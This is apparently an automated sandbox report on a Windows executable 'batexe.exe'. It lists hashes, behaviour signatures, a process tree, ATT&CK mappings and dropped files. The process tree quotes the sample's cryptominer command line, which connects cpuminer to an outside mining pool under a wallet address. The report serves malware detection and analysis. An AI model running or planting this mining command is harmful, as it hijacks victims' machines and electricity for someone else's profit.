73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
301s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 03:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2176	b2e.exe
3292	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
3292	cpuminer-sse2.exe
3292	cpuminer-sse2.exe
3292	cpuminer-sse2.exe
3292	cpuminer-sse2.exe
3292	cpuminer-sse2.exe
3292	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4912-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4912 wrote to memory of 2176	4912	batexe.exe	85
PID 4912 wrote to memory of 2176	4912	batexe.exe	85
PID 4912 wrote to memory of 2176	4912	batexe.exe	85
PID 2176 wrote to memory of 1864	2176	b2e.exe	86
PID 2176 wrote to memory of 1864	2176	b2e.exe	86
PID 2176 wrote to memory of 1864	2176	b2e.exe	86
PID 1864 wrote to memory of 3292	1864	cmd.exe	89
PID 1864 wrote to memory of 3292	1864	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Users\Admin\AppData\Local\Temp\7412.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7412.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7412.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7D0B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7412.tmp\b2e.exe

Filesize
1.7MB

MD5
a5573e8cd60c299060c023a1ab40409e

SHA1
7bd699407c4facd37c85fddd5ad405cfafcdac1b

SHA256
bec6f3651a2727aa74b0390de635c1c2b6387a312a83f340b6808c5399c88735

SHA512
81b693f0dd45ce94307dfd381f60da866ce5662b3b118b1b884f55960d55dbb13c36d8e332aa33df45dc988726c3924d9e591121c740d9fd87aa4c9c117e0aea

Download Submit
C:\Users\Admin\AppData\Local\Temp\7412.tmp\b2e.exe

Filesize
2.9MB

MD5
4f0163756c0d98cdaa0ecc549e91430e

SHA1
bcae9abe1f1614a0b6f66416a2637f736cfd505e

SHA256
b76dceb13b75968192a51e872889ee192c0a25ad2496a202863dd2e272fae374

SHA512
5cb964b809085ebb3fd18f22200f874924817f36d23199a2904ab074e61eb66d177cdbdcf5cef22a3c939cacb140113e01ef0cdebca254dd327a19fcb07fd9a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7412.tmp\b2e.exe

Filesize
3.4MB

MD5
469424e937356dea074c63081720fe60

SHA1
d14394b46fcd54d4411d476a533a3e93c8dea268

SHA256
9215bfb29240d1e784c2418fe7b634ea1c930c61530c57e74977d326e33d6eed

SHA512
602eae5f59014da9074de6184fdb5e6fd6b6b89af487698b3255672681a2f2847d4c94b0bc4d6198fee64dfb59715886d0297b41e74d5746b0a70652b26617f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7D0B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
409KB

MD5
41b02cdab5827db346fde70bbea6cf61

SHA1
0ab943237f6ce2d1a58b083d5ea9fcf2ab0c257f

SHA256
caf4b738d060e99cd1884836af8e9a9dde2050e87d820916f96adbef4c80abbc

SHA512
f559ffcd49f211c4757e4980eec1e41f14520f5210497b5028a14668012b3d35a3e21b663d7881811a79b25c12a8d800c516755385071d70ef635644c060efbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
591KB

MD5
6ce77a1ff28de525fffe20a612f07a51

SHA1
094ebdcbef95b5fca1f91b12cfeeec716833a7db

SHA256
2b0e32cbafabde1d89fff49262199e35586d54563639c764e46f6c76484c3dc0

SHA512
0da1dad067f4306fc8109799d0815bcbc537e55ff7045f48fb8a57584cedf26196828f364df140322f0fc983fcef68d1d0bfbfd69d9945b3be6459b5b6314970

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
429KB

MD5
06d7ac718172aecf62a38b8a89afc50a

SHA1
b0bb2be3dc558d11fc700e8b1739670c85e891ff

SHA256
8ab39cf58ce90849f8473da96676cae6e38cd3144b9d8fd1f368e774e5007402

SHA512
9d7937797045131914ede9fb1bc636f718277eb8f2ad499ceeb626837cb5857a47807c5d6b04e6c75115b58345391d1418133d4f6a497e3670f32bd9e11338cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
392KB

MD5
ff256f93e429fd22fbd84309cb1ad602

SHA1
680f4f34fb0080967c2b79fb7ec021c334d512ca

SHA256
7ae388d44aa623f571c12cc63e15e283763352ef83a554b73a0815b9e7b04c92

SHA512
f2fa0cb4523d678e7c0f0896cf97874f3f16cde5538c659929ce2f9091ab8502a8c8b02cdcc39f6fc9dcd39f322a2a27a850a4f951332f4bb2c51023f52c7f68

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
472KB

MD5
538d0c6db37d7763fa4c3dd3fc18c6a1

SHA1
2d935caaf04bf149431c80c50eb8f35f1dcd70ff

SHA256
5baa7f3f95d9b5cd3bada42280bf7d703e996c4e646b850b76e37647f327720d

SHA512
4bed220c29454d53991372e22246c49788b2b2e14b7b209913a557e9a220c08d83cd2238e71bf456a5066f245040c5f2b662d7c3a8a947bca3ac95deefe53c13

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
430KB

MD5
4e287db49d26ab7993a96ada63bcbd18

SHA1
24c9386ede9684bb062df4b8ad38bd6eeb3f1a96

SHA256
38cef7e4e51e86ffc73854de5eb166ce6d1c554a94a31159aa42228c72a25059

SHA512
65778c59cbd72f650c8607118b680a18555050ae79710eb81fdc34f4c2b9e61a22bbb8672c8abaecc403102eda6f5b951720f1352dd0f28e2d829badf7cc89cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
260KB

MD5
98485a2d8fd893d4aa0f12a211edff13

SHA1
cb64b45db95264abb96234bf2f4f918f11b35faa

SHA256
7905531a5bb91d70800d324d64d4d8fae30cef75c0217682590246e3f8f2f395

SHA512
d1f202576ce6d2659ea7bce003d5677fb6c2828ab29e3eb101876bbf14d9830f717d740a27c99fff4271aacef71f56f654f6f80fd3336f722722026c391d0df8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
397KB

MD5
999c4c0d92c5dca623d5868285f9dc80

SHA1
dd28b6aab85aa80b1c07fc27daddcab3ac88c6e8

SHA256
c7223c4e792bbf60bb6c234966cb815aff7675a133b8318fef0c1f6428e2f5be

SHA512
59ddebf7b3859ae49531e76bec7330e75a92b2df1c4f610b6f109edac3672262249e1f2b5abec2c8a685033645a60ba9f35c7003b8e9c44214ea14fa632ed106

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
251KB

MD5
d49231b1e9306e630b06558cf029d1a7

SHA1
3cb9bb5fe5d561addefaf6069492333f9f577265

SHA256
ca172309297847e3016824f81d60ea1b8f4d111bb12b0683d111029947b72fda

SHA512
fdae1b81efe09683318ae1888fe353cd442b7f3880cad42cde840035c614d8391a145dbca6c5e80705f9f15ea777f76f5ea00d892db4201de7332006008fd430

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
492KB

MD5
c945f591d2c18f96fc9f741fbf06dc8b

SHA1
83d5fbfb1912a595dfc61291ce186e26aa88a0f7

SHA256
143b569e485aa2c132fa0adf67f264b173ce30f1f9d82eeaf5a82a31d758084f

SHA512
fab18acc88319875247a484b7353426d5d2f87d0b06ea3226a883ec8415ec095c798f6f8ba3fd06c685fd33dba1b125c7eaa7743ad1fbb6d289427a69bd8908f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
270KB

MD5
7de5e1a62536f5d98f6f3c28429323db

SHA1
9d350c93ff55bfca853a81a3da51808c24ac3282

SHA256
3eb7f1bead0f71244e0a60ad4eae4b18cd015d658262bcb5de6a5ed3885fdb6b

SHA512
835a7ea9715a88517aadb6329a9c948ba78745f47734a204a06689bd23a7b0b3c0907f8c16d2e9e2d523784247db5afb73f5ed75e18c5be011851ab844c1311a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
227KB

MD5
1e3169300da89757448bda7c6afdedeb

SHA1
b3465bbfda461ddf8a8c24846ee2f3b9a4116ce8

SHA256
6e7dc61a34f9c5e2b8e12b537e64154dab0dee0d59f2ccad59ebb65bae909c9a

SHA512
62b688fd554c65ddba1486dcd5dc74240345e08c6bd4da1d63b441402aaa0b2ddf1eb50a98798a95e431c965ee9e809f5a366819e86909d26931f5dfad54cd76

Download Submit
memory/2176-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2176-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3292-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/3292-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3292-49-0x0000000051D90000-0x0000000051E28000-memory.dmp

Filesize
608KB

Download
memory/3292-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/3292-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/3292-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3292-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4912-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download